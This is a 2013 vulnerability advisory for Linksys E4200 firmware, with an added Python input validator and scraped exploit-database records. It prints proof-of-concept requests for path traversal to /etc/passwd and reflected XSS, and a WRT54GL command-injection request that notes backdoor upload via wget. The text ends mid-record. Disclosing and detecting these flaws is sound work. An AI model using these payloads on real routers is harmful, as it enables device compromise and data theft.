Cisco Linksys E4200 Cross Site Scripting / Local File Inclusion
2013-05-07T00:00:00
ID: PACKETSTORM:121551 | Type: packetstorm | Reporter: sqlhacker | Modified: 2013-05-07T00:00:00
Description
=============================================
XSS, LFI in Cisco, Linksys E4200 Firmware
=============================================
URL: http://www.cloudscan.me/2013/05/xss-lfi-linksys-e4200-firmware-0d.html
=============================================
January 30, 2013
=============================================
Keywords
=============================================
XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit,
Zero Day, Cisco, Linksys, E4200, Wireless Router, cyberTAN Corp
CVE-2013-2678, CVE-2013-2679, CVE-2013-2680, CVE-2013-2681, CVE-2013-2682,
CVE-2013-2683, CVE-2013-2684
=============================================
Summary
Reflected XSS and LFI bugs in the Cisco Linksys E4200 Wireless Router,
firmware version 1.0.05 build 7, were discovered by our researchers in
January 2013 and finally acknowledged by Linksys in April 2013. The vendor
is unable to patch the vulnerabilities in a reasonable timeframe. This
document introduces and discusses the vulnerabilities and provides
Proof-of-Concept (PoC) zero-day (0D) code examples for Firmware L Version
1.10, released on July 9, 2012, and prior versions.
=============================================
Overview
Linksys is a brand of home and small office networking products and a
company founded in 1988, which was acquired by Cisco Systems in 2003. In
2013, as part of its push away from the consumer market, Cisco sold their
home networking division and Linksys to Belkin. Former Linksys products are
now branded as Linksys by Cisco.
Products currently and previously sold under the Linksys brand name include
broadband and wireless routers, consumer and small business grade Ethernet
switching, VoIP equipment, wireless internet video camera, AV products,
network storage systems, and other products.
Linksys products were widely available in North America off-the-shelf from
both consumer electronics stores (CompUSA and Best Buy), internet
retailers, and big-box retail stores (WalMart). Linksys' significant
competitors as an independent networking firm were D-Link and NetGear, the
latter for a time being a brand of Cisco competitor Nortel.
=============================================
Vendor Software Fingerprint
=============================================
# Copyright (C) 2009, CyberTAN Corporation
# All Rights Reserved.
#
# THIS SOFTWARE IS OFFERED "AS IS", AND CYBERTAN GRANTS NO WARRANTIES OF ANY
# KIND, EXPRESS OR IMPLIED, BY STATUTE.....
=============================================
The PoCs
=============================================
LFI PoC
=============================================
POST /storage/apply.cgi HTTP/1.1
Host: my.vulnerable.e4500.firmware

submit_type=nas_admin&submit_button=NAS_Administration&change_action=gozila_cgi&next_page=../../../../../../../../../../../../../../../../etc/passwd
=============================================
XSS PoC
=============================================
/apply.cgi [log_type parameter]
/apply.cgi [ping_ip parameter]
/apply.cgi [ping_size parameter]
/apply.cgi [submit_type parameter]
/apply.cgi [traceroute_ip parameter]
/storage/apply.cgi [new_workgroup parameter]
/storage/apply.cgi [submit_button parameter]
=============================================
POST /apply.cgi HTTP/1.1
...

change_action=gozila_cgi&submit_button=Log_View&submit_type=undefined&log_type=&log_type=ilog14568"%3balert(1)//482
=============================================
Other XSS PoCs
=============================================
&ping_ip='><script>alert(1)</script>
&ping_size='><script>alert(1)</script>
&submit_type=start_traceroute'%3balert(1)//
&traceroute_ip=a.b.c.d"><script>alert(1)</script>
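The following is an added defender-side example, not code from the advisory or from the CyberTAN firmware: it applies positive (allow-list) validation to the apply.cgi parameters named above, confines next_page to a document root, and audits captured request bodies so that both the LFI PoC and the XSS PoCs are flagged. The document root /www, the per-parameter formats and the sample request bodies are assumptions constructed for the example.

```python
"""Positive validation and request auditing for the apply.cgi parameters
named in the E4200 advisory. Parameter shapes and WEB_ROOT are assumptions
made for this example, not the vendor's actual rules."""
import ipaddress
import posixpath
import re
from urllib.parse import parse_qs, unquote

WEB_ROOT = "/www"  # assumed (hypothetical) document root of the router's web UI

# DNS hostname labels: alphanumerics and '-', no leading/trailing '-', dot separated.
_HOSTNAME = re.compile(
    r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")
# Assumed shape of CGI action/button/log names: word characters only, so a
# quote, '<', ';' or '/' can never reach the page or a script context.
_TOKEN = re.compile(r"^[A-Za-z0-9_]{1,64}$")


def is_host(value):
    """Accept an IPv4/IPv6 literal or a plain hostname; reject everything else."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return bool(_HOSTNAME.match(value))


def is_packet_size(value):
    """ping_size must be a small positive integer (upper bound assumed)."""
    return value.isdigit() and 0 < int(value) <= 65500


def is_token(value):
    return bool(_TOKEN.match(value))


# Expected shape of each parameter the advisory lists as injectable (assumed).
VALIDATORS = {
    "ping_ip": is_host,
    "traceroute_ip": is_host,
    "ping_size": is_packet_size,
    "log_type": is_token,
    "submit_type": is_token,
    "submit_button": is_token,
    "change_action": is_token,
    "new_workgroup": is_token,
}


def resolve_next_page(next_page, web_root=WEB_ROOT):
    """Map a next_page value to a path confined to web_root; None means reject.

    Two layers: any '..' segment is refused outright (the value is URL-decoded
    twice first, so %2e%2e and %252e%252e are caught as well), and the
    canonicalised result must still lie under web_root as defence in depth."""
    decoded = unquote(unquote(next_page)).replace("\\", "/")
    if "\x00" in decoded or any(seg == ".." for seg in decoded.split("/")):
        return None
    canonical = posixpath.normpath(posixpath.join(web_root, decoded.lstrip("/")))
    if canonical != web_root and not canonical.startswith(web_root + "/"):
        return None
    return canonical


def audit_request(body):
    """Return [(param, value, reason)] for every parameter that fails its check.

    Works on an application/x-www-form-urlencoded body as captured from a
    proxy or access log; blank values are ignored."""
    findings = []
    for param, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            if param == "next_page":
                if resolve_next_page(value) is None:
                    findings.append((param, value, "path traversal"))
            elif param in VALIDATORS and value and not VALIDATORS[param](value):
                findings.append((param, value, "unexpected characters"))
    return findings


# Constructed sample bodies: the two PoC requests quoted in the advisory and
# one benign diagnostics submission (values assumed, not captured from a device).
LFI_POC = ("submit_type=nas_admin&submit_button=NAS_Administration"
           "&change_action=gozila_cgi"
           "&next_page=../../../../../../../../../../../../../../../../etc/passwd")
XSS_POC = ('change_action=gozila_cgi&submit_button=Log_View&submit_type=undefined'
           '&log_type=&log_type=ilog14568"%3balert(1)//482')
BENIGN = ("change_action=gozila_cgi&submit_button=Diagnostics"
          "&submit_type=start_ping&ping_ip=192.168.1.1&ping_size=32")

if __name__ == "__main__":
    for name, body in (("LFI PoC", LFI_POC), ("XSS PoC", XSS_POC), ("benign", BENIGN)):
        print(name, audit_request(body))
```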
=============================================
CVE Information
=============================================
File path traversal CVE-2013-2678
Cross-site scripting (reflected) CVE-2013-2679
Cleartext submission of password CVE-2013-2680
Password field with autocomplete enabled CVE-2013-2681
Frameable response (Clickjacking) CVE-2013-2682
Private IP addresses disclosed CVE-2013-2683
HTML does not specify charset CVE-2013-2684
CVSS Version 2 Score = 4.5
=============================================
END
=============================================
{"id": "PACKETSTORM:121551", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Cisco Linksys E4200 Cross Site Scripting / Local File Inclusion", "description": "", "published": "2013-05-07T00:00:00", "modified": "2013-05-07T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/121551/Cisco-Linksys-E4200-Cross-Site-Scripting-Local-File-Inclusion.html", "reporter": "sqlhacker", "references": [], "cvelist": ["CVE-2013-2678", "CVE-2013-2680", "CVE-2013-2681", "CVE-2013-2684", "CVE-2013-2679", "CVE-2013-2682", "CVE-2013-2683"], "lastseen": "2016-12-05T22:25:06", "viewCount": 10, "enchantments": {"score": {"value": 5.3, "vector": "NONE", "modified": "2016-12-05T22:25:06", "rev": 2}, "dependencies": {"references": [{"type": "exploitpack", "idList": ["EXPLOITPACK:79444388E4AB6DA3A97F1DB2022E7531"]}, {"type": "exploitdb", "idList": ["EDB-ID:25292", "EDB-ID:24478", "EDB-ID:24475", "EDB-ID:24202", "EDB-ID:38501"]}, {"type": "cve", "idList": ["CVE-2013-2678", "CVE-2013-2682", "CVE-2013-2681", "CVE-2013-2684", "CVE-2013-2683", "CVE-2013-2679", "CVE-2013-2680"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13169", "SECURITYVULNS:DOC:29559"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:122342"]}, {"type": "securelist", "idList": ["SECURELIST:6FF73BA3D8BB759BAC6F6A8B20F0F19D"]}], "modified": "2016-12-05T22:25:06", "rev": 2}, "vulnersScore": 5.3}, "sourceHref": "https://packetstormsecurity.com/files/download/121551/ciscolinksyse4200-xsslfi.txt", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA256 \n \n============================================= \n \nXSS, LFI in Cisco, Linksys E4200 Firmware \n \n============================================= \n \nURL: http://www.cloudscan.me/2013/05/xss-lfi-linksys-e4200-firmware-0d.html \n \n============================================= \n \n \nJanuary 30, 2013 \n \n============================================= \n \nKeywords \n 
\n============================================= \n \nXSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit, \nZero Day, Cisco, Linksys, E4200, Wireless Router, cyberTAN Corp \n \nCVE-2013-2678, CVE-2013-2679, CVE-2013-2680, CVE-2013-2681, CVE-2013-2682, \nCVE-2013-2683, CVE-2013-2684 \n \n============================================= \n \nSummary \n \nReflected XSS + LFI Bugs in the Cisco, Linksys E4200 Wireless Router \nFirmware Version: 1.0.05 build 7 were discovered by our Researchers in \nJanuary 2013 and finally acknowledged by Linksys in April 2013. The Vendor \nis unable to Patch the Vulnerability in a reasonable timeframe. This \ndocument will introduce and discuss the vulnerability and provide \nProof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version \n1.10 Released on July 9, 2012, and prior versions. \n \n============================================= \n \nOverview \n \nLinksys is a brand of home and small office networking products and a \ncompany founded in 1988, which was acquired by Cisco Systems in 2003. In \n2013, as part of its push away from the consumer market, Cisco sold their \nhome networking division and Linksys to Belkin. Former Linksys products are \nnow branded as Linksys by Cisco. \n \n \n \nProducts currently and previously sold under the Linksys brand name include \nbroadband and wireless routers, consumer and small business grade Ethernet \nswitching, VoIP equipment, wireless internet video camera, AV products, \nnetwork storage systems, and other products. \n \n \n \nLinksys products were widely available in North America off-the-shelf from \nboth consumer electronics stores (CompUSA and Best Buy), internet \nretailers, and big-box retail stores (WalMart). Linksys' significant \ncompetition as an independent networking firm were D-Link and NetGear, the \nlatter for a time being a brand of Cisco competitor Nortel. 
\n \n============================================= \n \nVendor Software Fingerprint \n \n============================================= \n \n# Copyright (C) 2009, CyberTAN Corporation \n \n# All Rights Reserved. \n \n# \n \n# THIS SOFTWARE IS OFFERED \"AS IS\", AND CYBERTAN GRANTS NO WARRANTIES OF \nANY \n \n# KIND, EXPRESS OR IMPLIED, BY STATUTE..... \n \n============================================= \n \nThe PoC's \n \n============================================= \n \nLFI PoC \n \n============================================= \n \nPOST /storage/apply.cgi HTTP/1.1 \n \nHOST: my.vunerable.e4500.firmware \n \nsubmit_type=nas_admin&submit_button=NAS_Administration&change_action=gozila \n_cgi&next_page=../../../../../../../../../../../../../../../../etc/passwd \n \n============================================= \n \nXSS PoC \n \n============================================= \n \n/apply.cgi [log_type parameter] \n \n/apply.cgi [ping_ip parameter] \n \n/apply.cgi [ping_size parameter] \n \n/apply.cgi [submit_type parameter] \n \n/apply.cgi [traceroute_ip parameter] \n \n/storage/apply.cgi [new_workgroup parameter] \n \n/storage/apply.cgi [submit_button parameter] \n \n============================================= \n \nPOST /apply.cgi HTTP/1.1 \n \n\ufffd.. 
\n \nchange_action=gozila_cgi&submit_button=Log_View&submit_type=undefined&log_t \nype=&log_type=ilog14568\"%3balert(1)//482 \n \n============================================= \n \nOther XSS PoC\ufffds \n \n============================================= \n \n&ping_ip='><script>alert(1)</script> \n \n&ping_size='><script>alert(1)</script> \n \n&submit_type=start_traceroute'%3balert(1)// \n \n&traceroute_ip=a.b.c.d\"><script>alert(1)</script> \n \n============================================= \n \nCVE Information \n \n============================================= \n \nFile path traversal CVE-2013-2678 \n \nCross-site scripting (reflected) CVE-2013-2679 \n \nCleartext submission of password CVE-2013-2680 \n \nPassword field with autocomplete enabled CVE-2013-2681 \n \nFrameable response (Clickjacking) CVE-2013-2682 \n \nPrivate IP addresses disclosed CVE-2013-2683 \n \nHTML does not specify charset CVE-2013-2684 \n \nCVSS Version 2 Score = 4.5 \n \n============================================= \n \nEND \n \n============================================= \n \n-----BEGIN PGP SIGNATURE----- \nVersion: 10.2.0.2526 \n \nwsBVAwUBUYkNUnz+WcLIygj0AQg1/QgAs9Ij9d9e6IYfZXeeiCZTwoKdgtOVkser \nM3c49LB4CnJrxMqlrVNhM5Y2YxjydpGG1EfNzc49L43dC2G/Q2cHRfQOWdgcIXEG \nuJPDmKcONMN+V+rwvncyulGnCgl7R7whxspjqQk4Ov6lM+rbL3ulEi5Lg2IwzoYy \nul0J8okWO9hTBWh9cbAiUMMJ7FsC3Kb0KUH2NepathT604Pif4zHtxcYY62jOEdy \n7xrUSt1HUw9HMC1s0MHLWcqUbJowSlx6cInl977WKphWB8bK0bqWJO+C0cCC3jdI \nV8qUOX2sfB2znwOcfsiTH4olBBH1nlXtnRJxyTr42qET4nBfqFOshg== \n=w123 \n-----END PGP SIGNATURE----- \n \n`\n"}
{"exploitpack": [{"lastseen": "2020-04-01T19:04:09", "description": "\nCisco Linksys E4200 - Multiple Vulnerabilities", "edition": 1, "published": "2013-05-07T00:00:00", "title": "Cisco Linksys E4200 - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2678", "CVE-2013-2680", "CVE-2013-2681", "CVE-2013-2684", "CVE-2013-2679", "CVE-2013-2682", "CVE-2013-2683"], "modified": "2013-05-07T00:00:00", "id": "EXPLOITPACK:79444388E4AB6DA3A97F1DB2022E7531", "href": "", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=============================================\n\nXSS, LFI in Cisco, Linksys E4200 Firmware\n\n=============================================\n\nURL: http://www.cloudscan.me/2013/05/xss-lfi-linksys-e4200-firmware-0d.html\n\n=============================================\n\n\nJanuary 30, 2013\n\n=============================================\n\nKeywords\n\n=============================================\n\nXSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit,\nZero Day, Cisco, Linksys, E4200, Wireless Router, cyberTAN Corp\n\nCVE-2013-2678, CVE-2013-2679, CVE-2013-2680, CVE-2013-2681, CVE-2013-2682,\nCVE-2013-2683, CVE-2013-2684\n\n=============================================\n\nSummary\n\nReflected XSS + LFI Bugs in the Cisco, Linksys E4200 Wireless Router\nFirmware Version: 1.0.05 build 7 were discovered by our Researchers in\nJanuary 2013 and finally acknowledged by Linksys in April 2013. The Vendor\nis unable to Patch the Vulnerability in a reasonable timeframe. This\ndocument will introduce and discuss the vulnerability and provide\nProof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version\n1.10 Released on July 9, 2012, and prior versions.\n\n=============================================\n\nOverview\n\nLinksys is a brand of home and small office networking products and a\ncompany founded in 1988, which was acquired by Cisco Systems in 2003. 
In\n2013, as part of its push away from the consumer market, Cisco sold their\nhome networking division and Linksys to Belkin. Former Linksys products are\nnow branded as Linksys by Cisco.\n\n\n\nProducts currently and previously sold under the Linksys brand name include\nbroadband and wireless routers, consumer and small business grade Ethernet\nswitching, VoIP equipment, wireless internet video camera, AV products,\nnetwork storage systems, and other products.\n\n\n\nLinksys products were widely available in North America off-the-shelf from\nboth consumer electronics stores (CompUSA and Best Buy), internet\nretailers, and big-box retail stores (WalMart). Linksys' significant\ncompetition as an independent networking firm were D-Link and NetGear, the\nlatter for a time being a brand of Cisco competitor Nortel.\n\n=============================================\n\nVendor Software Fingerprint\n\n=============================================\n\n# Copyright (C) 2009, CyberTAN Corporation\n\n# All Rights Reserved.\n\n#\n\n# THIS SOFTWARE IS OFFERED \"AS IS\", AND CYBERTAN GRANTS NO WARRANTIES OF\nANY\n\n# KIND, EXPRESS OR IMPLIED, BY STATUTE.....\n\n=============================================\n\nThe PoC's\n\n=============================================\n\nLFI PoC\n\n=============================================\n\nPOST /storage/apply.cgi HTTP/1.1\n\nHOST: my.vunerable.e4500.firmware\n\nsubmit_type=nas_admin&submit_button=NAS_Administration&change_action=gozila\n_cgi&next_page=../../../../../../../../../../../../../../../../etc/passwd\n\n=============================================\n\nXSS PoC\n\n=============================================\n\n /apply.cgi [log_type parameter]\n\n /apply.cgi [ping_ip parameter]\n\n /apply.cgi [ping_size parameter]\n\n /apply.cgi [submit_type parameter]\n\n /apply.cgi [traceroute_ip parameter]\n\n /storage/apply.cgi [new_workgroup parameter]\n\n /storage/apply.cgi [submit_button 
parameter]\n\n=============================================\n\nPOST /apply.cgi HTTP/1.1\n\n\ufffd..\n\nchange_action=gozila_cgi&submit_button=Log_View&submit_type=undefined&log_t\nype=&log_type=ilog14568\"%3balert(1)//482\n\n=============================================\n\nOther XSS PoC\ufffds\n\n=============================================\n\n&ping_ip='><script>alert(1)</script>\n\n&ping_size='><script>alert(1)</script>\n\n&submit_type=start_traceroute'%3balert(1)//\n\n&traceroute_ip=a.b.c.d\"><script>alert(1)</script>\n\n=============================================\n\nCVE Information\n\n=============================================\n\nFile path traversal CVE-2013-2678\n\nCross-site scripting (reflected) CVE-2013-2679\n\nCleartext submission of password CVE-2013-2680\n\nPassword field with autocomplete enabled CVE-2013-2681\n\nFrameable response (Clickjacking) CVE-2013-2682\n\nPrivate IP addresses disclosed CVE-2013-2683\n\nHTML does not specify charset CVE-2013-2684\n\nCVSS Version 2 Score = 4.5\n\n=============================================\n\nEND\n\n=============================================\n\n-----BEGIN PGP SIGNATURE-----\nVersion: 10.2.0.2526\n\nwsBVAwUBUYkNUnz+WcLIygj0AQg1/QgAs9Ij9d9e6IYfZXeeiCZTwoKdgtOVkser\nM3c49LB4CnJrxMqlrVNhM5Y2YxjydpGG1EfNzc49L43dC2G/Q2cHRfQOWdgcIXEG\nuJPDmKcONMN+V+rwvncyulGnCgl7R7whxspjqQk4Ov6lM+rbL3ulEi5Lg2IwzoYy\nul0J8okWO9hTBWh9cbAiUMMJ7FsC3Kb0KUH2NepathT604Pif4zHtxcYY62jOEdy\n7xrUSt1HUw9HMC1s0MHLWcqUbJowSlx6cInl977WKphWB8bK0bqWJO+C0cCC3jdI\nV8qUOX2sfB2znwOcfsiTH4olBBH1nlXtnRJxyTr42qET4nBfqFOshg==\n=w123\n-----END PGP SIGNATURE-----", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-03T01:03:21", "description": "Cisco Linksys E4200 Firmware - Multiple Vulnerabilities. CVE-2013-2678,CVE-2013-2679,CVE-2013-2680,CVE-2013-2681,CVE-2013-2682,CVE-2013-2683,CVE-2013-2684. 
W...", "published": "2013-05-07T00:00:00", "type": "exploitdb", "title": "Cisco Linksys E4200 Firmware - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2678", "CVE-2013-2680", "CVE-2013-2681", "CVE-2013-2684", "CVE-2013-2679", "CVE-2013-2682", "CVE-2013-2683"], "modified": "2013-05-07T00:00:00", "id": "EDB-ID:25292", "href": "https://www.exploit-db.com/exploits/25292/", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA256\r\n\r\n=============================================\r\n\r\nXSS, LFI in Cisco, Linksys E4200 Firmware\r\n\r\n=============================================\r\n\r\nURL: http://www.cloudscan.me/2013/05/xss-lfi-linksys-e4200-firmware-0d.html\r\n\r\n=============================================\r\n\r\n\r\nJanuary 30, 2013\r\n\r\n=============================================\r\n\r\nKeywords\r\n\r\n=============================================\r\n\r\nXSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit,\r\nZero Day, Cisco, Linksys, E4200, Wireless Router, cyberTAN Corp\r\n\r\nCVE-2013-2678, CVE-2013-2679, CVE-2013-2680, CVE-2013-2681, CVE-2013-2682,\r\nCVE-2013-2683, CVE-2013-2684\r\n\r\n=============================================\r\n\r\nSummary\r\n\r\nReflected XSS + LFI Bugs in the Cisco, Linksys E4200 Wireless Router\r\nFirmware Version: 1.0.05 build 7 were discovered by our Researchers in\r\nJanuary 2013 and finally acknowledged by Linksys in April 2013. The Vendor\r\nis unable to Patch the Vulnerability in a reasonable timeframe. This\r\ndocument will introduce and discuss the vulnerability and provide\r\nProof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version\r\n1.10 Released on July 9, 2012, and prior versions.\r\n\r\n=============================================\r\n\r\nOverview\r\n\r\nLinksys is a brand of home and small office networking products and a\r\ncompany founded in 1988, which was acquired by Cisco Systems in 2003. 
In\r\n2013, as part of its push away from the consumer market, Cisco sold their\r\nhome networking division and Linksys to Belkin. Former Linksys products are\r\nnow branded as Linksys by Cisco.\r\n\r\n\r\n\r\nProducts currently and previously sold under the Linksys brand name include\r\nbroadband and wireless routers, consumer and small business grade Ethernet\r\nswitching, VoIP equipment, wireless internet video camera, AV products,\r\nnetwork storage systems, and other products.\r\n\r\n\r\n\r\nLinksys products were widely available in North America off-the-shelf from\r\nboth consumer electronics stores (CompUSA and Best Buy), internet\r\nretailers, and big-box retail stores (WalMart). Linksys' significant\r\ncompetition as an independent networking firm were D-Link and NetGear, the\r\nlatter for a time being a brand of Cisco competitor Nortel.\r\n\r\n=============================================\r\n\r\nVendor Software Fingerprint\r\n\r\n=============================================\r\n\r\n# Copyright (C) 2009, CyberTAN Corporation\r\n\r\n# All Rights Reserved.\r\n\r\n#\r\n\r\n# THIS SOFTWARE IS OFFERED \"AS IS\", AND CYBERTAN GRANTS NO WARRANTIES OF\r\nANY\r\n\r\n# KIND, EXPRESS OR IMPLIED, BY STATUTE.....\r\n\r\n=============================================\r\n\r\nThe PoC's\r\n\r\n=============================================\r\n\r\nLFI PoC\r\n\r\n=============================================\r\n\r\nPOST /storage/apply.cgi HTTP/1.1\r\n\r\nHOST: my.vunerable.e4500.firmware\r\n\r\nsubmit_type=nas_admin&submit_button=NAS_Administration&change_action=gozila\r\n_cgi&next_page=../../../../../../../../../../../../../../../../etc/passwd\r\n\r\n=============================================\r\n\r\nXSS PoC\r\n\r\n=============================================\r\n\r\n /apply.cgi [log_type parameter]\r\n\r\n /apply.cgi [ping_ip parameter]\r\n\r\n /apply.cgi [ping_size parameter]\r\n\r\n /apply.cgi [submit_type parameter]\r\n\r\n /apply.cgi [traceroute_ip parameter]\r\n\r\n 
/storage/apply.cgi [new_workgroup parameter]\r\n\r\n /storage/apply.cgi [submit_button parameter]\r\n\r\n=============================================\r\n\r\nPOST /apply.cgi HTTP/1.1\r\n\r\n\ufffd..\r\n\r\nchange_action=gozila_cgi&submit_button=Log_View&submit_type=undefined&log_t\r\nype=&log_type=ilog14568\"%3balert(1)//482\r\n\r\n=============================================\r\n\r\nOther XSS PoC\ufffds\r\n\r\n=============================================\r\n\r\n&ping_ip='><script>alert(1)</script>\r\n\r\n&ping_size='><script>alert(1)</script>\r\n\r\n&submit_type=start_traceroute'%3balert(1)//\r\n\r\n&traceroute_ip=a.b.c.d\"><script>alert(1)</script>\r\n\r\n=============================================\r\n\r\nCVE Information\r\n\r\n=============================================\r\n\r\nFile path traversal CVE-2013-2678\r\n\r\nCross-site scripting (reflected) CVE-2013-2679\r\n\r\nCleartext submission of password CVE-2013-2680\r\n\r\nPassword field with autocomplete enabled CVE-2013-2681\r\n\r\nFrameable response (Clickjacking) CVE-2013-2682\r\n\r\nPrivate IP addresses disclosed CVE-2013-2683\r\n\r\nHTML does not specify charset CVE-2013-2684\r\n\r\nCVSS Version 2 Score = 4.5\r\n\r\n=============================================\r\n\r\nEND\r\n\r\n=============================================\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: 10.2.0.2526\r\n\r\nwsBVAwUBUYkNUnz+WcLIygj0AQg1/QgAs9Ij9d9e6IYfZXeeiCZTwoKdgtOVkser\r\nM3c49LB4CnJrxMqlrVNhM5Y2YxjydpGG1EfNzc49L43dC2G/Q2cHRfQOWdgcIXEG\r\nuJPDmKcONMN+V+rwvncyulGnCgl7R7whxspjqQk4Ov6lM+rbL3ulEi5Lg2IwzoYy\r\nul0J8okWO9hTBWh9cbAiUMMJ7FsC3Kb0KUH2NepathT604Pif4zHtxcYY62jOEdy\r\n7xrUSt1HUw9HMC1s0MHLWcqUbJowSlx6cInl977WKphWB8bK0bqWJO+C0cCC3jdI\r\nV8qUOX2sfB2znwOcfsiTH4olBBH1nlXtnRJxyTr42qET4nBfqFOshg==\r\n=w123\r\n-----END PGP SIGNATURE-----\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/25292/"}, {"lastseen": "2016-02-02T22:44:50", "description": "linksys wrt54gl firmware 
4.30.15 build 2 - Multiple Vulnerabilities. CVE-2013-2679. Webapps exploit for hardware platform", "published": "2013-01-18T00:00:00", "type": "exploitdb", "title": "linksys wrt54gl firmware 4.30.15 build 2 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2679"], "modified": "2013-01-18T00:00:00", "id": "EDB-ID:24202", "href": "https://www.exploit-db.com/exploits/24202/", "sourceData": "Device Name: Linksys WRT54GL v1.1\r\nVendor: Linksys/Cisco\r\n\r\n============ Vulnerable Firmware Releases: ============\r\n\r\nFirmware Version: 4.30.15 build 2, 01/20/2011\r\n\r\n============ Device Description: ============\r\n\r\nThe Router lets you access the Internet via a wireless connection, broadcast at up to 54 Mbps, or through one of its four switched ports. You can also use the Router to share resources such as computers, printers and files. A variety of security features help to protect your data and your privacy while online. Security features include WPA2 security, a Stateful Packet Inspection (SPI) firewall and NAT technology. Configuring the Router is easy using the provided browser-based utility.\r\n\r\nSource: http://homesupport.cisco.com/en-us/support/routers/WRT54GL\r\n\r\n============ Shodan Torks ============\r\n\r\nShodan Search: WRT54GL\r\n=> Results 27190 devices\r\n\r\n============ Vulnerability Overview: ============\r\n\r\n* OS Command Injection\r\n=> parameter: wan_hostname\r\n=> command: `%20ping%20192%2e168%2e178%2e101%20`\r\n\r\nThe vulnerability is caused by missing input validation in the wan_hostname parameter and can be exploited to inject and execute arbitrary shell commands. 
With wget it is possible to upload and execute a backdoor to compromise the device.\r\nYou need to be authenticated to the device or you have to find other methods for inserting the malicious commands.\r\n\r\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/OS-Command-Injection-param_wan_hostname.png\r\n\r\nPOST /apply.cgi HTTP/1.1\r\nHost: 192.168.178.166\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nProxy-Connection: keep-alive\r\nReferer: http://192.168.178.166/index.asp\r\nAuthorization: Basic xxxxx\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 734\r\nConnection: close\r\n\r\nsubmit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=test&wan_hostname=`%20ping%20192%2e168%2e178%2e101%20`&wan_domain=test&mtu_enable=1&wan_mtu=1500&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=178&lan_ipaddr_3=166&lan_netmask=255.255.255.0&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1\r\n\r\n=> Change the request method from HTTP Post to HTTP GET makes the exploitation 
easier:\r\n\r\nhttp://192.168.178.166/apply.cgi?submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=test&wan_hostname=`%20ping%20192%2e168%2e178%2e101%20`&wan_domain=test&mtu_enable=1&wan_mtu=1500&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=178&lan_ipaddr_3=166&lan_netmask=255.255.255.0&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1\r\n\r\n=> This setting is placed permanent into the configuration and so it gets executed on every bootup process of the device.\r\n\r\n* For changing the current password there is no request to the current password\r\n\r\nWith this vulnerability an attacker is able to change the current password without knowing it. 
